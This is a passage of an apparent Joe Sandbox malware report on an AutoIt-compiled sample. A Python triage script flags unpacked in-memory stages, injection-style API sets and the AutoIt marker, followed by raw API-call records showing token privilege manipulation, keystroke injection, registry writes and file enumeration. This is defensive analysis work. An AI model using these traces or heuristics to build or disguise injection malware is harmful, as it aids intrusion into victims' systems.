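The function records above carry three facts a triager wants pulled out of the noise: the functions at 013C0000 come from a memory region the report marks "based on PE: false" (a stage that was never loaded as an image), one of them has the API set Process$ContextCreateMemoryReadThreadWow64, which is what thread-context manipulation of another process looks like in this summary format, and the LoadLibraryExW caller in the PE-backed image passes the compiled-AutoIt marker string. The script below is an added example, not Joe Sandbox code: it parses the text form of these records and flags exactly those conditions. The word list and the three-word threshold used to call an API set "injection-style" are heuristic assumptions of this example, not a Joe Sandbox signature, and the embedded sample is an excerpt of four records from this report with their identical hash lines trimmed.

```python
"""Triage Joe Sandbox per-function records: non-PE memory, injection-style
API sets, and the compiled-AutoIt marker. Added example, not sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumption (heuristic, not a Joe Sandbox rule): words seen in the API IDs of
# hollowing / injection primitives such as CreateProcess, Wow64GetThreadContext,
# ReadProcessMemory, WriteProcessMemory, NtQueueApcThread, VirtualAllocEx.
INJECTION_WORDS = {"Process", "Create", "Context", "Thread", "Wow64", "Memory",
                   "Read", "Write", "Queue", "Apc", "Alloc", "Virtual", "Resume"}
INJECTION_MIN_HITS = 3                  # assumption: three matching words
AUTOIT_MARKER = ">>>AUTOIT NO CMDEXECUTE<<<"  # string visible in the report

# One API call line, e.g. "Sleep.KERNELBASE(000001F4), ref: 013C22B1" or
# "Part of subcall function 00CD4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00CD4BEF"
API_LINE = re.compile(r"^(?P<sub>Part of subcall function [0-9A-F]+: )?"
                      r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
                      r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall: bool


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    pe_backed: Optional[bool] = None    # from "based on PE: true|false"
    api_id: str = ""
    opcode_id: str = ""


def split_api_id(api_id: str) -> set:
    """'Process$ContextCreateMemoryReadThreadWow64' -> its CamelCase words."""
    words = set()
    for group in api_id.split("$"):
        for token in group.split("_"):
            words.update(re.findall(r"[A-Z][a-z0-9]*|[a-z0-9]+", token))
    return words


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per 'APIs' block; unknown lines are ignored."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("Source File:"):
            cur.source_file = line.split(":", 1)[1].split(",")[0].strip()
            m = re.search(r"based on PE: (true|false)", line)
            cur.pe_backed = (m.group(1) == "true") if m else None
        elif line.startswith("API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        else:
            m = API_LINE.match(line)
            if m:
                cur.calls.append(ApiCall(m["name"], m["module"], m["args"] or "",
                                         m["ref"], m["sub"] is not None))
    return records


def triage(rec: FunctionRecord) -> List[str]:
    """Findings for one record; an empty list means nothing stood out."""
    findings = []
    if rec.pe_backed is False:
        findings.append("runs from memory not backed by a PE image")
    hits = split_api_id(rec.api_id) & INJECTION_WORDS
    if len(hits) >= INJECTION_MIN_HITS:
        findings.append("injection-style API set: " + ", ".join(sorted(hits)))
    if any(AUTOIT_MARKER in c.args for c in rec.calls):
        findings.append("compiled-AutoIt marker string in call arguments")
    return findings


def flagged(text: str) -> dict:
    """Opcode-ID prefix -> findings, for every record that has findings."""
    out = {}
    for rec in parse_records(text):
        findings = triage(rec)
        if findings:
            out[rec.opcode_id[:12]] = findings
    return out


# Excerpt of four records from this report (hash lines trimmed).
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
APIs
  • Part of subcall function 00CD4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00CD4BEF
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4E0F
Memory Dump Source
• Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• Opcode ID: c98e0f4224676b7b744665df105cd49fb60d531d4b973d9f51f325279c4408f8
APIs
• Sleep.KERNELBASE(000001F4), ref: 013C22B1
Memory Dump Source
• Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
Similarity
• API ID: Sleep
• Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CF07B0
Memory Dump Source
• Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
Similarity
• API ID: LongNamePath
• Opcode ID: 7fbafeae321e6022c238e96fe08b3ff242bec264dd274e7a4e42338809bc9fc6
"""

if __name__ == "__main__":
    for prefix, findings in flagged(SAMPLE).items():
        print(prefix, "->", "; ".join(findings))
```

Run against the full report text, the same parser separates the AutoIt runtime's GUI, file and CRT helpers (PE-backed, no injection words) from the unpacked stage at 013C0000; the GetLongPathNameW record in the sample is kept as a negative case and produces no finding. The "based on PE" flag is the strongest of the three signals because it is stated by the sandbox itself; the API-word match is only a sort key for where to start reading.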
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00D5CB37
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D5CB95
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D5CBD6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D5CC00
                                                            • SendMessageW.USER32 ref: 00D5CC29
                                                            • _wcsncpy.LIBCMT ref: 00D5CC95
                                                            • GetKeyState.USER32(00000011), ref: 00D5CCB6
                                                            • GetKeyState.USER32(00000009), ref: 00D5CCC3
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D5CCD9
                                                            • GetKeyState.USER32(00000010), ref: 00D5CCE3
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D5CD0C
                                                            • SendMessageW.USER32 ref: 00D5CD33
                                                            • SendMessageW.USER32(?,00001030,?,00D5B348), ref: 00D5CE37
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00D5CE4D
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00D5CE60
                                                            • SetCapture.USER32(?), ref: 00D5CE69
                                                            • ClientToScreen.USER32(?,?), ref: 00D5CECE
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00D5CEDB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D5CEF5
                                                            • ReleaseCapture.USER32 ref: 00D5CF00
                                                            • GetCursorPos.USER32(?), ref: 00D5CF3A
                                                            • ScreenToClient.USER32(?,?), ref: 00D5CF47
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00D5CFA3
                                                            • SendMessageW.USER32 ref: 00D5CFD1
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00D5D00E
                                                            • SendMessageW.USER32 ref: 00D5D03D
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00D5D05E
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00D5D06D
                                                            • GetCursorPos.USER32(?), ref: 00D5D08D
                                                            • ScreenToClient.USER32(?,?), ref: 00D5D09A
                                                            • GetParent.USER32(?), ref: 00D5D0BA
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00D5D123
                                                            • SendMessageW.USER32 ref: 00D5D154
                                                            • ClientToScreen.USER32(?,?), ref: 00D5D1B2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D5D1E2
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00D5D20C
                                                            • SendMessageW.USER32 ref: 00D5D22F
                                                            • ClientToScreen.USER32(?,?), ref: 00D5D281
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00D5D2B5
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D5D351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$@U=u$F
                                                            • API String ID: 3977979337-1007936534
                                                            • Opcode ID: 01cf019850ccdca5694fdae9edda5498c7f45aea686224a6033d9adfeee34cc2
                                                            • Instruction ID: 5f42768fa2115264ba5ca763da3331911e83121e6231c7d131904df5da10d74f
                                                            • Opcode Fuzzy Hash: 01cf019850ccdca5694fdae9edda5498c7f45aea686224a6033d9adfeee34cc2
                                                            • Instruction Fuzzy Hash: 15428C74204340AFDB21CF24D844BAABBE5FF49352F180929FE95CB2A0D731D848DB62
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                            • API String ID: 1357608183-1798697756
                                                            • Opcode ID: f158d8c9dda09fbc385af5d42a2bc63f1d0872b8e0807b1d0ca4d019a0a0756b
                                                            • Instruction ID: 098fba0242e8719f78149a89b6a551e9cc450cd4fc17f887aed4cc58ddd509f5
                                                            • Opcode Fuzzy Hash: f158d8c9dda09fbc385af5d42a2bc63f1d0872b8e0807b1d0ca4d019a0a0756b
                                                            • Instruction Fuzzy Hash: D893C335E00229DFDB24CF59D881BBDB7B1FF58314F24816AE955AB280E7749E81CB60
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00CD48DF
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D0D665
                                                            • IsIconic.USER32(?), ref: 00D0D66E
                                                            • ShowWindow.USER32(?,00000009), ref: 00D0D67B
                                                            • SetForegroundWindow.USER32(?), ref: 00D0D685
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D0D69B
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D0D6A2
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D0D6AE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D0D6BF
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D0D6C7
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00D0D6CF
                                                            • SetForegroundWindow.USER32(?), ref: 00D0D6D2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0D6E7
                                                            • keybd_event.USER32(00000012,00000000), ref: 00D0D6F2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0D6FC
                                                            • keybd_event.USER32(00000012,00000000), ref: 00D0D701
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0D70A
                                                            • keybd_event.USER32(00000012,00000000), ref: 00D0D70F
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0D719
                                                            • keybd_event.USER32(00000012,00000000), ref: 00D0D71E
                                                            • SetForegroundWindow.USER32(?), ref: 00D0D721
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00D0D748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: f30822b55cc098ddd7ebe9fba6835f73303491562e217ce12df6105ed4ee6fe9
                                                            • Instruction ID: 39f40a8f7e62c3bc63427a6f0f5fa93c3c4677c6932e2444157209b3423a7a03
                                                            • Opcode Fuzzy Hash: f30822b55cc098ddd7ebe9fba6835f73303491562e217ce12df6105ed4ee6fe9
                                                            • Instruction Fuzzy Hash: CC317271A40318BBEB206BA19C49F7F7E6DEB44B51F104026FE05EB2D1D6B05901ABB1
                                                            APIs
                                                              • Part of subcall function 00D287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D2882B
                                                              • Part of subcall function 00D287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D28858
                                                              • Part of subcall function 00D287E1: GetLastError.KERNEL32 ref: 00D28865
                                                            • _memset.LIBCMT ref: 00D28353
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D283A5
                                                            • CloseHandle.KERNEL32(?), ref: 00D283B6
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D283CD
                                                            • GetProcessWindowStation.USER32 ref: 00D283E6
                                                            • SetProcessWindowStation.USER32(00000000), ref: 00D283F0
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D2840A
                                                              • Part of subcall function 00D281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D28309), ref: 00D281E0
                                                              • Part of subcall function 00D281CB: CloseHandle.KERNEL32(?,?,00D28309), ref: 00D281F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: fed692db5a2b3f90e093abdd924df76191022ed11f185a0453f00aabdd94fe74
                                                            • Instruction ID: 750bfa27c6daba9b1a790d8a9bed7839714566e3e2b2badacf7cf76175b8faab
                                                            • Opcode Fuzzy Hash: fed692db5a2b3f90e093abdd924df76191022ed11f185a0453f00aabdd94fe74
                                                            • Instruction Fuzzy Hash: 03815B71902219AFDF119FA4EC45AEEBB79EF18308F184169F910A6261DB318E15EB70
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00D3C78D
                                                            • FindClose.KERNEL32(00000000), ref: 00D3C7E1
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D3C806
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D3C81D
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3C844
                                                            • __swprintf.LIBCMT ref: 00D3C890
                                                            • __swprintf.LIBCMT ref: 00D3C8D3
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • __swprintf.LIBCMT ref: 00D3C927
                                                              • Part of subcall function 00CF3698: __woutput_l.LIBCMT ref: 00CF36F1
                                                            • __swprintf.LIBCMT ref: 00D3C975
                                                              • Part of subcall function 00CF3698: __flsbuf.LIBCMT ref: 00CF3713
                                                              • Part of subcall function 00CF3698: __flsbuf.LIBCMT ref: 00CF372B
                                                            • __swprintf.LIBCMT ref: 00D3C9C4
                                                            • __swprintf.LIBCMT ref: 00D3CA13
                                                            • __swprintf.LIBCMT ref: 00D3CA62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 8c94ae45fa2fd60c29f8ad04da811b8ef0ba9d6f12f416383004ec249558144f
                                                            • Instruction ID: 610685163e87fe9108c0c21b3ca855e246adec10e7e5f422f7925d74de90c0a8
                                                            • Opcode Fuzzy Hash: 8c94ae45fa2fd60c29f8ad04da811b8ef0ba9d6f12f416383004ec249558144f
                                                            • Instruction Fuzzy Hash: CFA11EB6408344ABC750EFA4C885DAFB7ECFF94704F40091AF695D6291EB31DA08DB62
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00D3EFB6
                                                            • _wcscmp.LIBCMT ref: 00D3EFCB
                                                            • _wcscmp.LIBCMT ref: 00D3EFE2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00D3EFF4
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00D3F00E
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00D3F026
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F031
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00D3F04D
                                                            • _wcscmp.LIBCMT ref: 00D3F074
                                                            • _wcscmp.LIBCMT ref: 00D3F08B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D3F09D
                                                            • SetCurrentDirectoryW.KERNEL32(00D88920), ref: 00D3F0BB
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D3F0C5
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F0D2
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F0E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: faa4a237f6f4a73378d41686b5d4b1ec6432489215fa9447f2c85ea61cd96133
                                                            • Instruction ID: 9b98a8797ff6b1b72ce439f1c4fb75f0e3ce6a0ffbc1932c79a127f51278e95c
                                                            • Opcode Fuzzy Hash: faa4a237f6f4a73378d41686b5d4b1ec6432489215fa9447f2c85ea61cd96133
                                                            • Instruction Fuzzy Hash: 5D31D07290130C7EDB18ABA8DC48BEEB7AC9F48361F180176F914E31A1DB70DA44DA75
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D50953
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D5F910,00000000,?,00000000,?,?), ref: 00D509C1
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00D50A09
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00D50A92
                                                            • RegCloseKey.ADVAPI32(?), ref: 00D50DB2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00D50DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: 1f8fbd801c2829608c02520f48ba5e5ab7fd0a44bb2fad14dc6ef0f5962b4e58
                                                            • Instruction ID: 27fc9ae559132999e85460dab2dcb5b59c18ec27107e88605c4860b3aff3ce02
                                                            • Opcode Fuzzy Hash: 1f8fbd801c2829608c02520f48ba5e5ab7fd0a44bb2fad14dc6ef0f5962b4e58
                                                            • Instruction Fuzzy Hash: EC0238756006019FCB54EF18C851E2ABBE5FF89710F08885DF99A9B3A2DB30ED05DB91
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00D3F113
                                                            • _wcscmp.LIBCMT ref: 00D3F128
                                                            • _wcscmp.LIBCMT ref: 00D3F13F
                                                              • Part of subcall function 00D34385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D343A0
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00D3F16E
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F179
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00D3F195
                                                            • _wcscmp.LIBCMT ref: 00D3F1BC
                                                            • _wcscmp.LIBCMT ref: 00D3F1D3
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D3F1E5
                                                            • SetCurrentDirectoryW.KERNEL32(00D88920), ref: 00D3F203
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D3F20D
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F21A
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F22C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: a7acdfe2ad501c3ed7e9cdcdcb747215db0a79d574b074ffcb712da220a926a0
                                                            • Instruction ID: 161f9e83d48a2bccf777299679e5392294da47d391426982d80ead99f8a2c4c1
                                                            • Opcode Fuzzy Hash: a7acdfe2ad501c3ed7e9cdcdcb747215db0a79d574b074ffcb712da220a926a0
                                                            • Instruction Fuzzy Hash: 1C31C27A90031DBEDB20ABA4EC59AEF77AC9F45361F140171E910E61A0DB30DA49DA78
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D3A20F
                                                            • __swprintf.LIBCMT ref: 00D3A231
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D3A26E
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D3A293
                                                            • _memset.LIBCMT ref: 00D3A2B2
                                                            • _wcsncpy.LIBCMT ref: 00D3A2EE
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00D3A323
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D3A32E
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00D3A337
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D3A341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: 322a472c24f7590266ca871a9dba0279fee7ba0bc205b2788cac348462230931
                                                            • Instruction ID: f7570d724da59577e6d1124e2fadf7f0ba72bdb05b91ee1c9e84e6460a6d95a6
